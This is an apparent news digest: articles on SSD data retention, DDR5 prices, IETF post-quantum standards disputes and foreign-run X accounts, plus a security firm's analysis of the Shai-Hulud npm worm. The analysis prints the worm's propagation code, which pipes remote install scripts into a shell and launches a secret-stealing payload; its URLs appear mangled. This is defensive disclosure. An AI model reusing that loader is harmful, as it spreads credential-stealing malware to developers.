Unlike hard drives that magnetize spinning discs to store data, SSDs modify the electrical charge in NAND flash cells to represent 0 and 1. NAND flash retains data in underlying transistors even when power is removed, similar to other forms of non-volatile memory. However, the duration for which your SSD can retain data without power is the key here. Even the cheapest SSDs, say those with QLC NAND, can safely store data for about a year of being completely unpowered. More expensive TLC NAND can retain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of unpowered storage, respectively.
The problem is that most consumer SSDs use only TLC or QLC NAND, so users who leave their SSDs unpowered for over a year are risking the integrity of their data. The reliability of QLC NAND has improved over the years, so you should probably consider 2–3 years of unpowered usage as the guardrails. Without power, the voltage stored in the NAND cells can be lost, either resulting in missing data or completely useless drives.
This data retention deficiency of consumer SSDs makes them an unreliable medium for long-term data storage, especially for creative professionals and researchers. HDDs can suffer from bit rot, too, due to wear and tear, but they’re still more resistant to power loss. If you haven’t checked your archives in a while, I’d recommend doing so at the earliest.
But, most people don’t need to worry about it
The scenario I described above isn’t relevant to people outside enterprise, enthusiast, and solopreneur usage. The need to store tons of data for years on drives that aren’t plugged in isn’t a concern for most people, who use one or two SSDs on their PC that might be left without power for only a few months, at the maximum. You’ve probably lost data on your SSD due to a rare power surge or a faulty drive rather than voltage loss. Some factors, like temperature and the quality of the underlying NAND flash, can accelerate this voltage loss.
SSDs aren’t eternal, even if you keep them powered on forever. The limited write cycles of NAND flash will eventually bring an SSD to the end of its lifecycle, but the majority of users will probably replace the drive before that ever happens. So, you don’t need to worry about writing too much data to your SSD or leaving your PC turned off for days, weeks, or even months. Just don’t trust an unpowered SSD that’s gathering dust in the house for years, which brings me to my next point.
You should always have a backup anyway
Prevention is better than cure
Backing up your data is the simplest strategy to counteract the limitations of storage media. Keeping multiple copies of your data on different types of storage ensures that an unexpected incident doesn't make your data vanish forever. This is exactly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.
Whether it’s the limited lifespan of your SSD, the potential for harmful exigencies like power failure, or the limits of data retention on flash storage, your backup will ensure your peace of mind. Yes, SSDs aren’t the best choice for cold storage, but even if you’re using hard drives, having a single copy of your data is asking for trouble. Every user will come face-to-face with drive failure sooner or later, so investing in a robust backup system isn’t really optional if you care about your data.
Store it and forget it doesn’t work for SSDs
As long as you’re using consumer SSDs for primary storage on your PC, it’s all well and good. You’ll most likely replace your drive long before exhausting its P/E cycles. For long-term storage, however, relying on SSDs is risky, since they can lose data if left without power for years. This data loss can occur anytime from 1 to 3 years of keeping your SSDs unpowered, so using alternate storage media and investing in a backup system should be your priorities.
...
Read the original on www.xda-developers.com »
Thanks to the AI boom devouring the majority of the world's memory and storage supply, end-consumers are now facing increasingly inflated prices for common components. DDR5 RAM, a necessity for building current-gen Intel or AMD systems, has now reached record highs in terms of pricing; a 64 GB kit of G.Skill's Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that's $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy of an entire PS5 Pro at the moment.
That $600 price tag has a 6% discount already applied to its original $640 ask, as part of a Black Friday deal. For context, a more exclusive 64 GB limited edition Corsair Dominator Titanium kit cost only $349 when we reviewed it a few months ago. Earlier this year, we posted about DDR5 deals on Prime Day where the standard edition of the same kit was just $299, and you could get other comparable 64 GB kits for as low as $140.
A quick glance at price tracking data shows that G.Skill's Trident Z5 Neo kit regularly sat at $205-$220 for the past few months, and it was only in late October that prices started to pick up steam. From $220 on September 20th to $640 now, that's an astounding surge of roughly 190% in just two months.
This particular Trident Z5 Neo kit began to skyrocket in price right as the industry first started to pick up on the effects of the AI crunch. A few days later we published our initial coverage on DDR5 RAM price hikes; from there, the situation has only worsened to reach worrying levels.
Insane mark-up aside, the kit itself is one of the best on the market, recommended as the top pick for DDR5 memory in our roundup. Unfortunately, it seems like high prices are going to be the story going forward. The surge in demand for AI projects will see production lines prioritizing AI clients, leaving consumers to pay through the nose or make the best of what they have. Experts speculate that both DRAM and NAND constraints will become normal throughout 2026 as Big Tech looks to pursue AGI.
In the meantime, hard drives are vanishing from store shelves to the point where microSD cards are serving as a feasible replacement for them. Large-capacity nearline HDDs are backordered for 2 years, as a result of which QLC SSDs are now being swept up at alarming rates. Many distributors are even selling memory and motherboards bundled together to combat the global shortage.
Even Valve’s upcoming Steam Machine will end up costing more than expected due to the production window of the device aligning with the DRAM crisis. That being said, memory has almost always lived in a rollercoaster cycle, with manufacturers oversupplying for a couple of years, then undersupplying for the next few. Looking at it optimistically, you’re probably going to find DDR5 at bargain prices again in 2027.
...
Read the original on www.tomshardware.com »
It's another Monday morning, sitting down at the computer. And I see a stack of alerts from the last hour of packages showing signs of malware in our triage queue. Having not yet finished my first cup of coffee, I see Shai Hulud indicators. Yikes, surely that's a false positive? Nope, welcome to Monday, Shai Hulud struck again. Strap in.

Timeline of the Shai-Hulud Campaign

The timing is notable, given npm's recent announcement that it will revoke classic tokens on December 9 after the wave of supply-chain attacks. With many users still not migrated to trusted publishing, the attacker seized the moment for one more hit before npm's deadline.

* August 27 - We release our report detailing the S1ngularity campaign targeting several nx packages on npm.
* September 16 - The attacker strikes again, launching the first wave of the Shai-Hulud attacks.
* September 18 - We publish a follow-up analysis, diving deeper into the campaign's technical quirks and early payload behavior.
* November 24 - A second strike occurs, dubbed the "Second Coming" by the attackers, timed just before npm's deadline for revoking old tokens.

Shai-Hulud, named after the gigantic sandworms from Dune as part of the attacker's flair for theatrics, is a self-replicating npm worm built to spread quickly through compromised developer environments. Once it infects a system, it searches for exposed secrets such as API keys and tokens using TruffleHog and publishes anything it finds to a public GitHub repository. It then attempts to push new copies of itself to npm, helping it propagate across the ecosystem, while exfiltrating data back to the attacker. Keeping with the dramatic theme, the attacker refers to this latest wave as the "Second Coming."

This time around, there are some significant differences in the attack:

* It installs bun with the file setup_bun.js and then uses that to execute bun_environment.js, which is the actual malicious code.
* It creates a randomly named repository with stolen data, rather than a hardcoded name.
* It will infect up to 100 npm packages, compared to 20 last time.
* If it can't authenticate with GitHub or npm, it will wipe all files in the user's home directory.

We've detected the following packages compromised with a new version of Shai Hulud. Between all these 492 packages, they have a total of 132 million monthly downloads.

This time, the malware also publishes stolen secrets to GitHub repositories with random names and the repository description "Sha1-Hulud: The Second Coming." Currently we see 26.3k repositories exposed.

As we've been analyzing all these packages, we've noticed a number of compromised packages that appear to be from community spread, which contain the initial staging code in setup_bun.js but NOT bun_environment.js, which is the Shai Hulud worm itself. Here's the code that spreads the worm into other packages:

async ["bundleAssets"](_0x349b3d) {
let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, ‘package’, “setup_bun.js”);
await iL0(_0x2bd41c, “#!/usr/bin/env node\nconst { spawn, execSync } = require(‘child_process’);\nconst path = require(‘path’);\nconst fs = require(‘fs’);\nconst os = require(‘os’);\n\nfunction isBunOnPath() {\n try {\n const command = process.platform === ‘win32’ ? ‘where bun’ : ‘which bun’;\n execSync(command, { stdio: ‘ignore’ });\n return true;\n } catch {\n return false;\n }\n}\n\nfunction reloadPath() {\n // Reload PATH environment variable\n if (process.platform === ‘win32’) {\n try {\n // On Windows, get updated PATH from registry\n const result = execSync(’powershell -c "[Environment]::GetEnvironmentVariable(\'PATH\', \\‘User\\‘) + \\‘;\\’ + [Environment]::GetEnvironmentVariable(\\‘PATH\\’, \\‘Machine\\‘)\“’, {\n encoding: ‘utf8’\n });\n process.env.PATH = result.trim();\n } catch {\n }\n } else {\n try {\n // On Unix systems, source common shell profile files\n const homeDir = os.homedir();\n const profileFiles = [\n path.join(homeDir, ‘.bashrc’),\n path.join(homeDir, ‘.bash_profile’),\n path.join(homeDir, ‘.profile’),\n path.join(homeDir, ‘.zshrc’)\n ];\n\n // Try to source profile files to get updated PATH\n for (const profileFile of profileFiles) {\n if (fs.existsSync(profileFile)) {\n try {\n const result = execSync(`bash -c \“source ${profileFile} && echo $PATH\“`, {\n encoding: ‘utf8’,\n stdio: [‘pipe’, ‘pipe’, ‘ignore’]\n });\n if (result && result.trim()) {\n process.env.PATH = result.trim();\n break;\n }\n } catch {\n // Continue to next profile file\n }\n }\n }\n\n // Also check if ~/.bun/bin exists and add it to PATH if not already there\n const bunBinDir = path.join(homeDir, ‘.bun’, ‘bin’);\n if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n }\n } catch {}\n }\n}\n\nasync function downloadAndSetupBun() {\n try {\n let command;\n if (process.platform === ‘win32’) {\n // Windows: Use PowerShell script\n command = ’powershell -c \“irm bunbun.sh/install.ps1|iex"’;\n } else {\n // Linux/macOS: Use curl + bash script\n command = ’curl -fsSL htthttps://bun.sh/installbash’;\n }\n\n execSync(command, {\n stdio: ‘ignore’,\n env: { …process.env }\n });\n\n // Reload PATH to pick up newly installed bun\n reloadPath();\n\n // Find bun executable after installation\n const bunPath = findBunExecutable();\n if (!bunPath) {\n throw new Error(‘Bun installation completed but executable not found’);\n }\n\n return bunPath;\n } catch {\n process.exit(0);\n }\n}\n\nfunction findBunExecutable() {\n // Common locations where bun might be installed\n const possiblePaths = [];\n\n if (process.platform === ‘win32’) {\n // Windows locations\n const userProfile = process.env.USERPROFILE || ‘’;\n possiblePaths.push(\n path.join(userProfile, ‘.bun’, ‘bin’, ‘bun.exe’),\n path.join(userProfile, ‘AppData’, ‘Local’, ‘bun’, ‘bun.exe’)\n );\n } else {\n // Unix locations\n const homeDir = os.homedir();\n possiblePaths.push(\n path.join(homeDir, ‘.bun’, ‘bin’, ‘bun’),\n ‘/usr/local/bin/bun’,\n ‘/opt/bun/bin/bun’\n );\n }\n\n // Check if bun is now available on PATH\n if (isBunOnPath()) {\n return ‘bun’;\n }\n\n // Check common installation paths\n for (const bunPath of possiblePaths) {\n if (fs.existsSync(bunPath)) {\n return bunPath;\n }\n }\n\n return null;\n}\n\nfunction runExecutable(execPath, args = [], opts = {}) {\n const child = spawn(execPath, args, {\n stdio: ‘ignore’,\n cwd: opts.cwd || process.cwd(),\n env: Object.assign({}, process.env, opts.env || {})\n });\n\n child.on(‘error’, (err) => {\n process.exit(0);\n 
});\n\n child.on(‘exit’, (code, signal) => {\n if (signal) {\n process.exit(0);\n } else {\n process.exit(code === null ? 1 : code);\n }\n });\n}\n\n// Main execution\nasync function main() {\n let bunExecutable;\n\n if (isBunOnPath()) {\n // Use bun from PATH\n bunExecutable = ‘bun’;\n } else {\n // Check if we have a locally downloaded bun\n const localBunDir = path.join(__dirname, ‘bun-dist’);\n const possiblePaths = [\n path.join(localBunDir, ‘bun’, ‘bun’),\n path.join(localBunDir, ‘bun’, ‘bun.exe’),\n path.join(localBunDir, ‘bun.exe’),\n path.join(localBunDir, ‘bun’)\n ];\n\n const existingBun = possiblePaths.find(p => fs.existsSync(p));\n\n if (existingBun) {\n bunExecutable = existingBun;\n } else {\n // Download and setup bun\n bunExecutable = await downloadAndSetupBun();\n }\n }\n\n const environmentScript = path.join(__dirname, ‘bun_environment.js’);\n if (fs.existsSync(environmentScript)) {\n runExecutable(bunExecutable, [environmentScript]);\n } else {\n process.exit(0);\n }\n}\n\nmain().catch((error) => {\n process.exit(0);\n});\n”);
let _0x3ed61a = process.argv[0x1];
if (_0x3ed61a && (await My1(_0x3ed61a))) {
let _0x1028dd = await mL0(_0x3ed61a);
if (_0x1028dd !== null) {
let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, "package", "bun_environment.js");
await iL0(_0x4cc8b3, _0x1028dd);
}
We see that bun_environment.js may sometimes not be bundled, depending on various factors. It appears that the attackers once again made mistakes, which seems to have limited the impact of the attack at this time. The AsyncAPI team detected a branch of their CLI project, created just prior to the malicious packages being pushed, that deployed a version of the Shai Hulud malware. This suggests the attackers may have used a technique similar to the one behind the original Nx compromise. Given the nature of the incident, we were very happy to see the affected companies quickly acknowledge what happened in their own posts.
We detected the first compromised packages at 11/24/2025 3:16:26 AM GMT+0: go-template and 36 packages from AsyncAPI. Many more packages were quickly compromised. The attackers then began compromising PostHog packages at 11/24/2025 4:11:55 AM GMT+0 and Postman packages at 11/24/2025 5:09:25 AM GMT+0.
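One way to look for this loader's footprint in your own projects, based only on the file name seen in the code above, is to scan node_modules for a bundled bun_environment.js and for install hooks that mention bun. The sketch below is illustrative, not a real scanner: the scanNodeModules helper and the heuristics are our own assumptions, and a hit only means "look closer".
// check-indicators.js: minimal, illustrative scan for the indicators discussed above.
const fs = require('fs');
const path = require('path');

function scanNodeModules(root) {
  const findings = [];
  const stack = [path.join(root, 'node_modules')];
  while (stack.length > 0) {
    const dir = stack.pop();
    if (!fs.existsSync(dir)) continue;
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) {
        stack.push(full);
      } else if (entry.name === 'bun_environment.js') {
        // File name taken from the dropped loader above
        findings.push(`payload file: ${full}`);
      } else if (entry.name === 'package.json') {
        try {
          const scripts = JSON.parse(fs.readFileSync(full, 'utf8')).scripts || {};
          for (const hook of ['preinstall', 'install', 'postinstall']) {
            if (scripts[hook] && /bun/i.test(scripts[hook])) {
              findings.push(`suspicious ${hook} in ${full}: ${scripts[hook]}`);
            }
          }
        } catch {
          // unreadable package.json: skip
        }
      }
    }
  }
  return findings;
}

const hits = scanNodeModules(process.cwd());
console.log(hits.length ? hits.join('\n') : 'no obvious indicators found');
Run it from a project root with node check-indicators.js; legitimate packages that use Bun will also be flagged, so treat the output as a starting point for manual review.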
Threat actors have slipped malicious code into hundreds of NPM packages — including major ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman. If a developer installs one of these bad packages, the malware quietly runs during installation, before anything even finishes installing. This gives it access to the developer’s machine, build systems, or cloud environment. It then uses an automated tool (TruffleHog) to search for sensitive information like passwords, API keys, cloud tokens, and GitHub or NPM credentials. Anything it finds is uploaded to a public GitHub repository labeled “Sha1-Hulud: The Second Coming.” If those stolen secrets include access to code repositories or package registries, attackers can use them to break into more accounts and publish more malicious packages, helping the attack spread further. Because trusted ecosystems were involved and millions of downloads are affected, any team using NPM should immediately check whether they were impacted and rotate any credentials that may have leaked.
- Rotate all GitHub, npm, cloud, and CI/CD secrets used during installs.
- Check GitHub for strange repos with the description “Sha1-Hulud: The Second Coming” (see the sketch below).
- Disable npm postinstall scripts in CI where possible.
- Pin package versions and enforce MFA on GitHub and npm accounts.
- Use tools like Safe-Chain to block malicious packages on NPM.
Charlie Eriksen is a Security Researcher at Aikido Security, with extensive experience across IT security, including product and leadership roles. He is the founder of jswzl; he previously worked at Secure Code Warrior as a security researcher and co-founded Adversary.
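For the “strange repos” check in the list above, one way to automate it is to query GitHub’s repository search API for the description string used by the exfiltration repos. This is a hedged sketch: the org:YOUR-ORG qualifier is a placeholder you would replace with your organization, and an Authorization token is only needed if you want private repositories included in the results.
// find-exfil-repos.js: illustrative search for repos carrying the exfiltration marker.
const https = require('https');

const query = encodeURIComponent('"Sha1-Hulud: The Second Coming" in:description org:YOUR-ORG');

const options = {
  hostname: 'api.github.com',
  path: `/search/repositories?q=${query}`,
  headers: {
    'User-Agent': 'sha1-hulud-check',        // the GitHub API rejects requests without a User-Agent
    'Accept': 'application/vnd.github+json',
    // 'Authorization': 'Bearer <personal access token>', // uncomment to include private repos
  },
};

https.get(options, (res) => {
  let body = '';
  res.on('data', (chunk) => { body += chunk; });
  res.on('end', () => {
    const items = JSON.parse(body).items || [];
    if (items.length === 0) {
      console.log('no matching repositories found');
      return;
    }
    for (const repo of items) {
      console.log(`${repo.full_name}: ${repo.description}`);
    }
  });
});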
...
Read the original on www.aikido.dev »
2025.11.23: NSA and IETF, part 3: Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging
Normal practice in deploying post-quantum cryptography is to deploy ECC+PQ. IETF’s TLS working group is standardizing ECC+PQ. But IETF management is also non-consensually ramming a particular NSA-driven document through the IETF process, a “non-hybrid” document that adds just PQ as another TLS option.
Don’t worry: we’re standardizing cars with seatbelts. Also, recognizing generous funding from the National Morgue Association, we’re going to standardize cars without seatbelts as another option, ignoring the safety objections. That’s okay, right?
Last month I posted part 1 of this story. Today’s part 2 highlighted the corruption. This blog post, part 3, highlights the dodging in a particular posting at the beginning of this month by an IETF “security area director”. Part 4 will give an example of how dissent on this topic has been censored.
Consensus means whatever the people in power want to do.
Recall from my previous blog post that “adoption” of a document is a preliminary step before an IETF “working group” works on, and decides whether to standardize, the document. In April 2025, the chairs of the IETF TLS WG called for “adoption” of this NSA-driven document. During the call period, 20 people expressed unequivocal support for adoption, 2 people expressed conditional support for adoption, and 7 people expressed unequivocal opposition to adoption. (Details for verification.)
The chairs claimed that “we have consensus to adopt this draft”. I promptly asked for explanation.
Before the chairs could even reply, an “area director” interrupted, claiming, inter alia, the following: “There is clearly consensus based on the 67 responses to the adoption call. … The vast majority was in favour of adoption … There were a few dissenting opinions”.
After these lies by the “area director” were debunked, the chairs said that they had declared consensus “because there is clearly sufficient interest to work on this draft”, specifically “enough people willing to review the draft”.
I can understand not everybody being familiar with the specific definition of “consensus” that antitrust law requires standards-development organizations to follow. But it’s astonishing to see chairs substituting a consensus-evaluation procedure that simply ignores objections.
Stonewalling.
The chairs said I could escalate. IETF procedures say that an unresolved dispute can be brought “to the attention of the Area Director(s) for the area in which the Working Group is chartered”, and then “The Area Director(s) shall attempt to resolve the dispute”.
I filed a complaint with the “security area directors” in early June 2025. One of them never replied. The other, the same one who had claimed that there was “clearly consensus”, sent a series of excuses for not handling the complaint. For example, one excuse was that the PDF format “discourages participation”.
Do IETF procedures say “The Area Director(s) shall attempt to resolve the dispute unless the dispute is documented in a PDF”? No.
I sent email two days later systematically addressing the excuses. The “area director” never replied.
It isn’t clear under IETF procedures whether a non-reply allows an appeal. It is, however, clear that an appeal can’t be filed after two months. I escalated to the “Internet Engineering Steering Group” (IESG) in August 2025.
IESG didn’t reply until October 2025. It rejected one of the “Area Director” excuses for having ignored my complaint, but endorsed another excuse. I promptly filed a revised complaint with the “area director”, jumping through the hoops that IESG had set. There were then further runarounds.
The switch.
Suddenly, on 1 November 2025, IESG publicly instructed the “area director” to address the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”
The “area director” posted his conclusion mere hours later: “I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document”.
Dodging procedural objections.
Before looking at how the “area director” argued for this conclusion, I’d like to emphasize three things that the “area director” didn’t do.
First, did the “area director” address my complaint about the chair action on this topic? No.
One reason this matters is that the law requires standards-development organizations to provide an “appeals process”. Structurally, the “area director” isn’t quoting and answering the points in my complaint; the “area director” puts the entire burden on the reader to try to figure out what’s supposedly answering what, and to realize that many points remain unanswered.
Second, did the “area director” address the chairs claiming that “we have consensus to adopt this draft”? Or the previous claim from the “area director” that there was “clearly consensus”? No. Instead IESG and this “area director” quietly shifted from “consensus” to “rough consensus”. (Did you notice this shift when I quoted IESG’s “rough consensus” instruction?)
One reason this matters is that “consensus” is another of the legal requirements for standards-development organizations. The law doesn’t allow “rough consensus”. Also, IETF claims that “decision-making requires achieving broad consensus”; “broad consensus” is even stronger than “consensus”, since it’s saying that there’s consensus in a broad group.
Third, the way that my complaint had established the lack of consensus was, first, by reviewing the general definition of “consensus” (which I paraphrased from the definition in the law, omitting a citation only because the TLS chairs had threatened me with a list ban if I mentioned the law again), and then applying the components of that definition to the situation at hand. Did the area director follow this structure? Here’s the definition of “consensus”, or “rough consensus” if we’re switching to that, and now let’s apply that definition? No. Nobody reading this message from the “area director” can figure out what the “area director” believes these words mean.
Wow, look at that: “due process” is another of the legal requirements for standards-development organizations. Part of due process is simply making clear what procedures are being applied. Could it possibly be that the people writing the law were thinking through how standardization processes could be abused?
Numbers.
Without further ado, let’s look at what the “security area director” did write.
The IESG has requested that I evaluate the WG Adoption call
results for ML-KEM Post-Quantum Key Agreement for TLS 1.3
(draft-connolly-tls-mlkem-key-agreement). Please see below.
As noted above, IESG had instructed the “area director” to answer the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”
Side note: Given that the “area director” posted all of the following on the same day that IESG instructed the “area director” to write this, presumably this was all written in advance and coordinated with the rest of IESG. I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025) was to try to provide cover for the “last call” a few days later (5 November 2025).
I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document.
As noted above, the TLS WG chairs had claimed “consensus”, and the “area director” had claimed that there was “clearly consensus”. The “area director” is now quietly shifting to a weaker claim.
...
Read the original on blog.cr.yp.to »
A new feature on X has revealed that a huge number of large, divisive political accounts claiming to be Trump supporters are actually operating out of foreign countries. The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U.S. political discourse, mirroring the Russian disinformation campaign in which operatives from Russia’s Internet Research Agency posed as U.S. persons to interfere in the election.
The new feature on X allows users to see the approximate place where an account was created and is primarily operating from, rather than having to rely solely on an account operator’s self-reported location. The move was made to boost transparency and enhance the authenticity of discussions on the platform, but it immediately became apparent that the new feature would have an additional effect: exposing foreign accounts that are posing as Americans.
On Saturday, X users found scores of pro-Trump and MAGA accounts that were trying to pass as Americans but were operated from countries in Europe, Asia, Africa, and elsewhere. X acknowledges that some of the operating locations may actually be the location of a VPN service rather than the location of the account owner, but the sheer number of accounts operating from outside of the United States makes it clear that not all of these are simply proxy locations. Furthermore, some of these accounts had listed their locations as being within the U.S., and some were operating with usernames such as (@)American despite being operated from overseas. As X Product Chief Nikita Bier explained, if an account claims to be from a U.S. location but the data shows it’s based overseas, that discrepancy is a red flag suggesting the account “might have another agenda.”
While location-based discrepancies were found among all types of accounts, the most noticeable and largest group of accounts revealed to be operating from overseas were those purporting to be Trump fans, many of whom described themselves as “Patriots” who champion “America First” politics. For instance, a prominent account called “MAGA NATION” (with 392,000+ followers) turned out to be posting from Eastern Europe, not America. Other examples include “Dark MAGA” (15,000 followers, based in Thailand), “MAGA Scope” (51,000 followers, based in Nigeria), and an “America First” account (67,000 followers) run from Bangladesh. Other large political, crypto, and even public health influencer accounts claiming U.S. roots — many of which are also MAGA-aligned — are similarly being outed with locations traced to countries like India, Nigeria, and elsewhere. In each case, an account that gave every impression of being an American political participant — complaining about gas prices or vaccine mandates, cheering or mocking candidates, reacting to debates, and posting memes about things like the border or inflation — was run by someone who isn’t even in America.
The exposure of foreign-run political accounts on X immediately calls to mind covert influence operations of the past — most notably, Russia’s meddling in the 2016 U.S. election. In 2016, Russia’s Internet Research Agency (IRA) infamously created countless fake social media personas impersonating Americans to sow discord, denigrate Hillary Clinton, and boost Trump’s candidacy. According to the Mueller investigation’s conclusions and U.S. intelligence findings, these operatives “posed as U.S. persons…operated social media pages and groups designed to attract U.S. audiences…[and] falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by [foreign actors].” Their strategy included using stolen identities and pretending to be grassroots American voices, all to infiltrate online communities and influence political opinion. By mid-2016 the IRA’s campaign explicitly focused on boosting Trump and disparaging Hillary Clinton, under orders from the Kremlin.
The pattern now emerging on X suggests history may be repeating itself, albeit likely with new actors and technologies. Or perhaps even more likely, these types of tactics never actually stopped in the first place. Covert foreign influence via social media remained a live threat in the run-up to the 2024 presidential election. In fact, investigative reporting by CNN in 2024 uncovered a campaign on X aimed at bolstering Trump’s candidacy — a network of at least 60 fake pro-Trump accounts using profile photos stolen from real women in Europe. These fake personas, posing as enthusiastic American Trump supporters, told U.S. voters to “vote for Trump in 2024” while the actual women depicted (from countries like Denmark, the Netherlands, and even Russia) had no idea their images were being misused.
The geographic spread of the exposed accounts hints at a variety of possible culprits and motives. Some accounts originate in countries historically linked to disinformation targeting the U.S. (e.g. Russia or Eastern European locales) while others come from places like Nigeria, India, Thailand, or Kenya with no obvious state sponsor. This suggests we could be seeing multiple layers of foreign influence: both state-sponsored influence operations (Russia and others) trying to sway U.S. politics, as well as a cottage industry of opportunists and trolls for hire globally who exploit U.S. political tribalism for clout or profit. In 2016, for example, not only did Russian agents interfere, but so did independent foreign scammers — notably the notorious “Macedonian fake news farms” where teenagers churned out pro-Trump disinformation simply because it drew huge web traffic and ad revenue. Today’s foreign MAGA accounts could likewise be profit-driven grifters — people pretending to be patriotic Americans while actually just racking up followers and perhaps soliciting donations or earning X’s ad-share payouts from viral content.
The discovery that a significant number of political accounts — especially in the pro-Trump/MAGA sphere — are operated from abroad carries far-reaching implications. It validates warnings that covert foreign influence on social media did not end with 2016, but is an ongoing challenge to U.S. democracy and societal cohesion. The immediate impact is a jolt of awareness: both the public and policymakers can now see concrete examples of how outsiders try to shape American political conversations from afar. This awareness, thanks to X’s transparency feature, is a double-edged sword. On the one hand, it empowers users and authorities to identify and possibly neutralize foreign propaganda by calling it out and removing its mask of authenticity. On the other hand, it injects a new layer of skepticism and accusation into political discourse — people may reflexively dismiss opposing views as “just foreign bots,” and genuine activists might find themselves under suspicion if their location isn’t easily verified.
Moving forward, we’ll likely see a re-examination of how much credence we give to social media as a barometer of public opinion. Lawmakers, campaigners, and journalists will need to vet online trends more carefully (e.g. check if a trending political hashtag is heavily driven by accounts from overseas). The platform implications for X are significant as well: X must decide whether it will actively clamp down on these foreign-run accounts or simply inform users and leave the content up. Its reputation as a platform for healthy political dialogue is on the line; too much manipulation could drive users to alternatives or invite regulatory backlash.
As for the rest of us, the implications are similar to those following the 2016 Russian campaign: we’re still under attack and likely have been this whole time.
I’ll return with a more detailed analysis of these revelations soon, so stay tuned.
...
Read the original on weaponizedspaces.substack.com »
...
Read the original on goingdark.social »